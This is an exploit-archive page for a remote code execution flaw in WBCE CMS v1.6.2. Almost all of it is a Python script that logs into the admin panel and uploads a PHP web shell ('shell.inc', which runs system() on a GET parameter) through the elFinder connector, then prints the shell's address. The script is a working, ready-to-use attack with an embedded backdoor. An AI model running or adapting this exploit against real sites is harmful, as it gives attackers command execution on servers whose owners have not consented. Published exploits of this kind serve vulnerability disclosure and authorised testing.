Wbce cms v1.6.2 remote code execution (rce) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2024-06-03 | Type : webapps | Platform : php


[+] Code ...

# Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE)
# Date: 3/5/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://wbce-cms.org/
# Software Link:
https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip
# Version: 1.6.2
# Tested on: MacOS

import requests
from bs4 import BeautifulSoup
import sys
import time

def login(url, username, password):
print("Logging in...")
time.sleep(3)
with requests.Session() as session:
response = session.get(url + "/admin/login/index.php")
soup = BeautifulSoup(response.text, 'html.parser')
form = soup.find('form', attrs={'name': 'login'})
form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in
form.find_all('input') if input_tag.get('type') != 'submit'}
# Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle
form_data[soup.find('input', {'name': 'username_fieldname'})['value']] =
username
form_data[soup.find('input', {'name': 'password_fieldname'})['value']] =
password
post_response = session.post(url + "/admin/login/index.php", data=form_data)
if "Administration" in post_response.text:
print("Login successful!")
time.sleep(3)
return session
else:
print("Login failed.")
print("Headers received:", post_response.headers)
print("Response content:", post_response.text[:500]) # İlk 500 karakter
return None

def upload_file(session, url):
# Dosya içeriğini ve adını belirleyin
print("Shell preparing...")
time.sleep(3)
files = {'upload[]': ('shell.inc',"""<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>""", 'application/octet-stream')}
data = {
'reqid': '18f3a5c13d42c5',
'cmd': 'upload',
'target': 'l1_Lw',
'mtime[]': '1714669495'
}
response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php",
files=files, data=data)
if response.status_code == 200:
print("Your Shell is Ready: " + url + "/media/shell.inc")
else:
print("Failed to upload file.")
print(response.text)

if __name__ == "__main__":
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
session = login(url, username, password)
if session:
upload_file(session, url)